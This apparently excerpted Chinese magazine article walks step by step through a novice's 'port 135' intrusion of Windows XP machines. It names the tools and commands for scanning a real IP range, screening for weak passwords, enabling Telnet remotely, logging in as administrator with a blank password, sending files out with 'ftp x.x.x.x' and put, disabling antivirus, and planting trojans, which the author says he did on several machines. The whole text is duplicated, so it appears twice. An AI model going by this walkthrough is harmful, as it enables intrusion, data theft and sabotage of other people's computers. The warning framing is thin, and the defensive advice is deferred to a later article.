论文部分内容阅读
在过去,黑客是很神秘的角色,可如今,想当一名黑客是太容易了。不信?本文就展示了一位菜鸟黑客的经历,目的是揭秘黑客手段,提醒大家做好自身的安全防范。
有天在网上闲逛,无意中笔者闯进了一个黑客社区,看到了很多人正在炫耀自己的“丰功伟绩”:
“我今天又盗了几个QQ靓号!”
“昨天盗的ADSL账号,可以狂冲我的Q币,你也要冲点不?”
“我盗了一个魔兽号,这家伙很有钱呢!”
“昨晚入侵了几台电脑,看到一些很有意思的图片呢!”
这些不道德的行为在互联网的环境下确实难以管束,然而产生这些现象的原因也是多方面的。一方面是如今做黑客太容易了,通过搜索引擎就能找到很多相关的资料和工具,另一方面是很多人的电脑处于不安全的状态。就在这个社区里,笔者轻易地得到了一段攻击视频。
这样,网上有大把的肉鸡,也有大把的黑客教程,想成为一名菜鸟黑客有多简单呢?笔者没有任何黑客经验,不过在看完了这段的135端口入侵演示动画后,依葫芦画瓤地很快就学会了这种简单的入侵方法。
第一次入侵
所谓入侵,首先就要找对方的漏洞,135入侵就是从对方的135端口入侵,这是个相当敏感的端口,当年大名鼎鼎的冲击波病毒就是利用了这个端口。
入侵的第一步就是扫描网上开启了135端口的电脑。扫描工具有很多,这里以《S扫描器》为例,它的速度比较快。另外,还有图形界面的SpuerScan、X-Scan等等。输入如下命令:
stcp 222.241.192.0 222.241.225.255 135 100/save
两段IP地址分别是扫描的开始地址和结束地址(这里选择的是和笔者的电脑处于同一B类网段的IP),后面的135表示端口号,100表示同时开启的扫描线程数,数字越大扫描速度就越快,但也更容易出现漏扫(winxP SP2默认限制TCP/IP线程数为10,要用修改工具改掉这个限制才行)。/save表示把扫描结果保存到一个名为Result.txt的文本文件里。
第二步是从开启了135端口的电脑中筛选出可以入侵的电脑。用到的工具是NTscan。我们打开刚才生成的Result.txt文件,删除多余的信息,只留下IP地址,然后保存。接着用NTsacn打开该文件,选择WMI扫描,端口一栏输入135,就可开始进行筛选。
NTscan会根据字典文件中设置的用户名和口令来筛选出那些空口令或者弱口令的电脑(注:字典文件是NT_user.dic和NT_pass.dic这两个文件,我们可以自行修改其内容)。NTsacn会把扫描结果保存到NTscan.txI文件里。
第三步是用Recton来远程开启对方的Telnet功能。打开Recton,选择Telnet,从NTscan.txt文件中随便找个地址222.241.193.107,把它输入到远程主机一栏,再填入用户名和密码,点击“开始执行”按钮,Recton就会自动利用135漏洞去开启对方的Telnet功能,当然这一过程不是每次都能成功的,开启成功后下面的提示框就会显示相关信息。
第四步是Telnet到对方的电脑。点击“开始一运行”,输入cmd,回车,在命令提示符模式下,输入telnet 222.241.193.107,回车,就会出现telnet登录界面,如果对方的操作系统是Windows XP,就会提示“您将要把您的密码信息送到Internet区内的一台远程计算机上。这可能不安全。您还要送吗(y/n):”。选择n,不然会退出连接。我们输入用户名administrator,密码为空,回车后,等待一会,就能进入对方的电脑了。这样一来,入侵就成功了。
入侵后的乐趣——揭秘黑客常见行为
入侵别人的电脑后,黑客会可以做些什么呢?在单调的黑色命令提示符模式下,黑客能发掘出什么样的乐趣来呢?下面让我一一为你揭秘。
1.删除文件,偷窃文件
用Telnet登录对方的电脑后,就好像在本机运行CMD程序一样,为此我们要熟悉一些常用的DOS命令。比如列表命令Dir、路径切换命令CD等,另外还要熟悉一些参数,比如dir/a可以显示隐藏文件和文件夹,dir/W可以多列显示等等。这些参数可以组合使用,要想了解的话,还是去网上搜索一下常用DOS命令介绍的文章吧。
我们可以用del命令删除对方电脑上的文件,甚至可以用format命令格式化对方的硬盘,当然这样做是极不道德的,试想如果把某个正在准备答辩的研究生的论文全部删除了,估计对方连跳楼的心思都有。更多的时候,黑客入侵别人的电脑是为了偷东西而不是搞破坏,那么如何在DOS状态下把对方的文件偷走呢?这就要用到ftp命令。
我们可以在网上申请有ftp功能的主页空间,或者在自己的电脑上安装Serv-U,把自己的电脑变成FTP服务器。然后在对方的电脑里输入ftp x.x.x.x,输入用户名和密码,就能登录到FTP服务器。之后使用“put文件名.扩展名”命令就能把文件传自己的FTP服务器上去。如果要上传大量文件,可以把文件列表复制下来,用UltraEdit来编辑成批处理命令即可。这比用那些有图形界面的木马程序偷文件要快得多。
2.种植木马,为所欲为
当然,在DOS模式下,我们能做的操作还是比较有限的,而且敲命令毕竟还是有些不方便,要把对方变成自己的肉鸡,就要在对方的电脑里种木马。
种植木马后,用户的电脑就成为了彻底的肉鸡,黑客可以对它为所欲为,用户在黑客面前将没有任何隐私,偷取密码自然不在话下,甚至用户的电脑会成为黑客用来搞网络攻击的帮凶。笔者试着在几台肉鸡中种植了守望者木马。
3.关掉杀毒软件
种植木马成功的条件是木马不会被对方电脑的杀毒软件查杀,但现在杀毒软件种类繁多,升级病毒库也越来越频繁,加壳或修改特征码不一定会成功免杀,所以还有人研究如何在Telnet模式下关闭对方电脑的杀毒软件。
比如使用DOsT的杀进程工具pskill来杀掉杀毒软件进程,或者用Windows自身的taskkill和net stop等命令来关闭杀毒软件进程或服务。不过现在有的杀毒软件本身有了进程保护措施,可以防止自身进程被非法关闭。
除此之外,还有人提出把病毒库“掏空”的观点,就是破坏对方的病毒库,这样对方的杀毒软件就变成瞎子了。
4.开启远程桌面功能
虽然通过木马能够监控对方的屏幕甚至远程控制对方的桌面,但是控制对方的鼠标和键盘很容易被发现,所以黑客更倾向于使用Windows的远程桌面功能。Windows XP默认只支持一个用户登录,但是只要把3389破解工具传到对方的电脑里,就能破解该限制,实现Windows XP的多用户同时登录,这样黑客就可以用远程桌面连接到对方电脑,和操作自己的电脑一样,自然方便多了。
螳螂捕蝉,黄雀在后
由于菜鸟黑客往往使用别人编写的黑客工具,所以有时也会被老鸟欺负。比如有的黑客工具暗藏玄机,当菜鸟黑客用木马控制了不少肉鸡后,这些肉鸡可能暗地里也被木马的制作者控制了,不然那些动辄由上万肉鸡构成的僵尸网络是不会那么容易建立起来的。
有的菜鸟黑客使用木马去盗取别人的账号,但这些木马的制作者可能也给另设后门,把较好的账号筛选出来发邮件给制作者,把剩下的发给菜鸟黑客也说不定。
一般来说,有经验的菜鸟黑客通常会选择在肉鸡上实验新的黑客工具,或者使用虚拟机来进行实验,因为黑客工具往往都会被杀毒软件查杀,在本机实验的话必须关闭杀毒软件才行,那样自己的电脑就没得安全保障了。像我做135入侵实验就是在虚拟机上做的,这样一来,就算黑客工具另有后门,也害不到我自己的电脑了。
前面介绍的是比较常见的135入侵,其他常见的入侵方法还有139入侵、1433入侵、3389l入侵、48991入侵等等,甚至还可以利用网站的程序漏洞来入侵服务器。当然,现在很多菜鸟黑客都不喜欢这种辛苦的主动入侵方式,而选择的是挂网页木马的方式,自己只要守株待兔就行。
现在我们已经知道自己的电脑在互联网上是多么的不安全,如果稍有不注意,就有可能被黑客光顾,那么我们该如何防范黑客入侵呢?请继续关注本栏目后续文章。
有天在网上闲逛,无意中笔者闯进了一个黑客社区,看到了很多人正在炫耀自己的“丰功伟绩”:
“我今天又盗了几个QQ靓号!”
“昨天盗的ADSL账号,可以狂冲我的Q币,你也要冲点不?”
“我盗了一个魔兽号,这家伙很有钱呢!”
“昨晚入侵了几台电脑,看到一些很有意思的图片呢!”
这些不道德的行为在互联网的环境下确实难以管束,然而产生这些现象的原因也是多方面的。一方面是如今做黑客太容易了,通过搜索引擎就能找到很多相关的资料和工具,另一方面是很多人的电脑处于不安全的状态。就在这个社区里,笔者轻易地得到了一段攻击视频。
这样,网上有大把的肉鸡,也有大把的黑客教程,想成为一名菜鸟黑客有多简单呢?笔者没有任何黑客经验,不过在看完了这段的135端口入侵演示动画后,依葫芦画瓤地很快就学会了这种简单的入侵方法。
第一次入侵
所谓入侵,首先就要找对方的漏洞,135入侵就是从对方的135端口入侵,这是个相当敏感的端口,当年大名鼎鼎的冲击波病毒就是利用了这个端口。
入侵的第一步就是扫描网上开启了135端口的电脑。扫描工具有很多,这里以《S扫描器》为例,它的速度比较快。另外,还有图形界面的SpuerScan、X-Scan等等。输入如下命令:
stcp 222.241.192.0 222.241.225.255 135 100/save
两段IP地址分别是扫描的开始地址和结束地址(这里选择的是和笔者的电脑处于同一B类网段的IP),后面的135表示端口号,100表示同时开启的扫描线程数,数字越大扫描速度就越快,但也更容易出现漏扫(winxP SP2默认限制TCP/IP线程数为10,要用修改工具改掉这个限制才行)。/save表示把扫描结果保存到一个名为Result.txt的文本文件里。
第二步是从开启了135端口的电脑中筛选出可以入侵的电脑。用到的工具是NTscan。我们打开刚才生成的Result.txt文件,删除多余的信息,只留下IP地址,然后保存。接着用NTsacn打开该文件,选择WMI扫描,端口一栏输入135,就可开始进行筛选。
NTscan会根据字典文件中设置的用户名和口令来筛选出那些空口令或者弱口令的电脑(注:字典文件是NT_user.dic和NT_pass.dic这两个文件,我们可以自行修改其内容)。NTsacn会把扫描结果保存到NTscan.txI文件里。
第三步是用Recton来远程开启对方的Telnet功能。打开Recton,选择Telnet,从NTscan.txt文件中随便找个地址222.241.193.107,把它输入到远程主机一栏,再填入用户名和密码,点击“开始执行”按钮,Recton就会自动利用135漏洞去开启对方的Telnet功能,当然这一过程不是每次都能成功的,开启成功后下面的提示框就会显示相关信息。
第四步是Telnet到对方的电脑。点击“开始一运行”,输入cmd,回车,在命令提示符模式下,输入telnet 222.241.193.107,回车,就会出现telnet登录界面,如果对方的操作系统是Windows XP,就会提示“您将要把您的密码信息送到Internet区内的一台远程计算机上。这可能不安全。您还要送吗(y/n):”。选择n,不然会退出连接。我们输入用户名administrator,密码为空,回车后,等待一会,就能进入对方的电脑了。这样一来,入侵就成功了。
入侵后的乐趣——揭秘黑客常见行为
入侵别人的电脑后,黑客会可以做些什么呢?在单调的黑色命令提示符模式下,黑客能发掘出什么样的乐趣来呢?下面让我一一为你揭秘。
1.删除文件,偷窃文件
用Telnet登录对方的电脑后,就好像在本机运行CMD程序一样,为此我们要熟悉一些常用的DOS命令。比如列表命令Dir、路径切换命令CD等,另外还要熟悉一些参数,比如dir/a可以显示隐藏文件和文件夹,dir/W可以多列显示等等。这些参数可以组合使用,要想了解的话,还是去网上搜索一下常用DOS命令介绍的文章吧。
我们可以用del命令删除对方电脑上的文件,甚至可以用format命令格式化对方的硬盘,当然这样做是极不道德的,试想如果把某个正在准备答辩的研究生的论文全部删除了,估计对方连跳楼的心思都有。更多的时候,黑客入侵别人的电脑是为了偷东西而不是搞破坏,那么如何在DOS状态下把对方的文件偷走呢?这就要用到ftp命令。
我们可以在网上申请有ftp功能的主页空间,或者在自己的电脑上安装Serv-U,把自己的电脑变成FTP服务器。然后在对方的电脑里输入ftp x.x.x.x,输入用户名和密码,就能登录到FTP服务器。之后使用“put文件名.扩展名”命令就能把文件传自己的FTP服务器上去。如果要上传大量文件,可以把文件列表复制下来,用UltraEdit来编辑成批处理命令即可。这比用那些有图形界面的木马程序偷文件要快得多。
2.种植木马,为所欲为
当然,在DOS模式下,我们能做的操作还是比较有限的,而且敲命令毕竟还是有些不方便,要把对方变成自己的肉鸡,就要在对方的电脑里种木马。
种植木马后,用户的电脑就成为了彻底的肉鸡,黑客可以对它为所欲为,用户在黑客面前将没有任何隐私,偷取密码自然不在话下,甚至用户的电脑会成为黑客用来搞网络攻击的帮凶。笔者试着在几台肉鸡中种植了守望者木马。
3.关掉杀毒软件
种植木马成功的条件是木马不会被对方电脑的杀毒软件查杀,但现在杀毒软件种类繁多,升级病毒库也越来越频繁,加壳或修改特征码不一定会成功免杀,所以还有人研究如何在Telnet模式下关闭对方电脑的杀毒软件。
比如使用DOsT的杀进程工具pskill来杀掉杀毒软件进程,或者用Windows自身的taskkill和net stop等命令来关闭杀毒软件进程或服务。不过现在有的杀毒软件本身有了进程保护措施,可以防止自身进程被非法关闭。
除此之外,还有人提出把病毒库“掏空”的观点,就是破坏对方的病毒库,这样对方的杀毒软件就变成瞎子了。
4.开启远程桌面功能
虽然通过木马能够监控对方的屏幕甚至远程控制对方的桌面,但是控制对方的鼠标和键盘很容易被发现,所以黑客更倾向于使用Windows的远程桌面功能。Windows XP默认只支持一个用户登录,但是只要把3389破解工具传到对方的电脑里,就能破解该限制,实现Windows XP的多用户同时登录,这样黑客就可以用远程桌面连接到对方电脑,和操作自己的电脑一样,自然方便多了。
螳螂捕蝉,黄雀在后
由于菜鸟黑客往往使用别人编写的黑客工具,所以有时也会被老鸟欺负。比如有的黑客工具暗藏玄机,当菜鸟黑客用木马控制了不少肉鸡后,这些肉鸡可能暗地里也被木马的制作者控制了,不然那些动辄由上万肉鸡构成的僵尸网络是不会那么容易建立起来的。
有的菜鸟黑客使用木马去盗取别人的账号,但这些木马的制作者可能也给另设后门,把较好的账号筛选出来发邮件给制作者,把剩下的发给菜鸟黑客也说不定。
一般来说,有经验的菜鸟黑客通常会选择在肉鸡上实验新的黑客工具,或者使用虚拟机来进行实验,因为黑客工具往往都会被杀毒软件查杀,在本机实验的话必须关闭杀毒软件才行,那样自己的电脑就没得安全保障了。像我做135入侵实验就是在虚拟机上做的,这样一来,就算黑客工具另有后门,也害不到我自己的电脑了。
前面介绍的是比较常见的135入侵,其他常见的入侵方法还有139入侵、1433入侵、3389l入侵、48991入侵等等,甚至还可以利用网站的程序漏洞来入侵服务器。当然,现在很多菜鸟黑客都不喜欢这种辛苦的主动入侵方式,而选择的是挂网页木马的方式,自己只要守株待兔就行。
现在我们已经知道自己的电脑在互联网上是多么的不安全,如果稍有不注意,就有可能被黑客光顾,那么我们该如何防范黑客入侵呢?请继续关注本栏目后续文章。